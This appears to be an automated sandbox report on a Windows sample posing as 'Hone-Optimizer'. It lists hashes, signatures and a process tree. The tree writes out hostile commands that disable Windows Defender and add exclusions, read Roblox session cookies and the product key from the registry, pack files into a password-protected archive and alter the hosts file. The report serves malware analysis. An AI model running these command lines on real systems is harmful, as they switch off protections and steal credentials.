| SHA512 | b60e6368d89f6bc5e8c399ae8f905f2893c24987543c2bcf3a3a5012fb34ac58d23aeeed08e9504fac20851e695bd67a8e221ae93965ace6c88fde35d2453214 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\WaitDismount.docx
| MD5 | acefb00c59c3252a8a702121cd7f426d |
| SHA1 | 0bb216020e4c1ba462f15629d219d5963fe15902 |
| SHA256 | 6799b938c02e5c781c8d6363ee94a739132627c663734b75a17ac69107834ddc |
| SHA512 | 5c2a5ce3d4a0ccfe94a8f9d1d62de0d26273c0e1265a9325618f7a1efa9cd0d27834680332c6bb7002125c5ad0c9e0eefea91dfcf5663edf15d3eb5ea6ee5254 |
memory/3632-256-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp
memory/3632-262-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp
memory/3632-257-0x00007FFB53770000-0x00007FFB53793000-memory.dmp
memory/4432-281-0x000001BBF6150000-0x000001BBF636D000-memory.dmp
memory/3632-312-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp
memory/3632-318-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp
memory/3632-317-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp
memory/3632-316-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp
memory/3632-315-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp
memory/3632-314-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp
memory/3632-313-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp
memory/3632-311-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp
memory/3632-310-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp
memory/3632-309-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp
memory/3632-308-0x00007FFB53770000-0x00007FFB53793000-memory.dmp
memory/3632-307-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp
memory/3632-306-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp
memory/3632-305-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp
memory/3632-304-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp
C:\Windows\Logs\DISM\dism.log
| MD5 | 3516b679779fb751a5b99ec1e2ac47aa |
| SHA1 | 2d0666acf799dbe2010bac34f485f62cd2f54c1b |
| SHA256 | 5b63f7dea0f62243e2336135a409f5a791d23673cc6fd1b3e9ab467797fdf6b4 |
| SHA512 | 7edc5688ebc5bf917332c7a74a4fc77b1f22a7549260835e94a9922c8a8a85b29176833844dec4bc80aacc0b4c6811ee439f7f67485889209a5c98ed2c9fc0bd |
C:\Users\Admin\AppData\Local\Temp\REG53B.tmp
| MD5 | d9d87947864e599c0c9e561743f727b5 |
| SHA1 | c35191953263416c1a3f72169a80e34d3c9bf41f |
| SHA256 | 765bc555c9c31b1500ef267138fe2d120ebc39fa855dfbf9da6b4a65b6f7578d |
| SHA512 | b6f52c644522ab995d0d882704f874ea3c7eb05fd494c497411ac57ee421af6ed9eaf727ae8b0a87c553cebf616a856e97e0508b8482a532ab64bba7e8949066 |
memory/2640-364-0x0000000000BB0000-0x0000000000BBC000-memory.dmp
memory/2640-365-0x00000000054A0000-0x00000000054BA000-memory.dmp
memory/1900-405-0x0000000004880000-0x0000000004881000-memory.dmp
memory/2660-421-0x000002A528DA0000-0x000002A528DC0000-memory.dmp
memory/2660-439-0x000002A528DC0000-0x000002A528DE0000-memory.dmp
memory/2660-438-0x000002A528DE0000-0x000002A528E00000-memory.dmp
memory/2660-455-0x000002A53B8D0000-0x000002A53B9D0000-memory.dmp
memory/4232-505-0x0000000002B40000-0x0000000002B41000-memory.dmp
memory/2288-522-0x00000270EFDD0000-0x00000270EFDF0000-memory.dmp
memory/2288-540-0x00000270F0400000-0x00000270F0420000-memory.dmp
memory/2288-539-0x00000270F0420000-0x00000270F0440000-memory.dmp
memory/2288-554-0x00000270F3810000-0x00000270F3910000-memory.dmp
memory/3180-605-0x0000000004560000-0x0000000004561000-memory.dmp
memory/3548-607-0x000002AB42900000-0x000002AB42A00000-memory.dmp
memory/3548-632-0x000002B344C70000-0x000002B344C90000-memory.dmp
memory/3548-630-0x000002B344C90000-0x000002B344CB0000-memory.dmp
memory/3548-621-0x000002B344C50000-0x000002B344C70000-memory.dmp
memory/3548-654-0x000002B358360000-0x000002B358460000-memory.dmp
memory/3348-705-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/2492-706-0x000002A972140000-0x000002A972240000-memory.dmp
memory/2492-707-0x000002A972140000-0x000002A972240000-memory.dmp
memory/2492-728-0x000002A973640000-0x000002A973660000-memory.dmp
memory/2492-739-0x000002A973660000-0x000002A973680000-memory.dmp
memory/2492-738-0x000002A973680000-0x000002A9736A0000-memory.dmp
memory/2492-753-0x000002A975CD0000-0x000002A975DD0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NUNBTRQ\microsoft.windows[1].xml
| MD5 | d6c1b4bb94dc9522fb7c83c87ea5d841 |
| SHA1 | 19ea83a7d4fe8b02f285c684bdb48727c97e9196 |
| SHA256 | f1551216ac0ba29d3b3ad772ff70fd8baa6ca6194df69d51248e425884027608 |
| SHA512 | 05b9aaf43e5464d43f8b4baf7ba913f0a87b5c5adc5c5a8c865982fa341380542fc6c6dd6953bdfd826dfd0cba7db120be206730cead002dcb1b743c80cf4e34 |
memory/4864-806-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
memory/1200-809-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-810-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-808-0x0000017407C00000-0x0000017407D00000-memory.dmp
memory/1200-841-0x0000017C0A400000-0x0000017C0A420000-memory.dmp
memory/1200-840-0x0000017C0A6F0000-0x0000017C0A710000-memory.dmp
memory/1200-823-0x0000017C0A1D0000-0x0000017C0A1F0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 11:53
Reported
2024-11-14 11:59
Platform
win11-20241007-en
Max time kernel
334s
Max time network
337s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\system32\reg.exe
reg add HKLM /F
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
C:\Windows\system32\reg.exe
reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg query "HKCU\Software\Hone" /v "Disclaimer"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp" "c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "Disclaimer" /f
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
C:\Windows\system32\Dism.exe
dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe {16FFE513-AB3D-4775-805B-D0AAF557EA14}
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
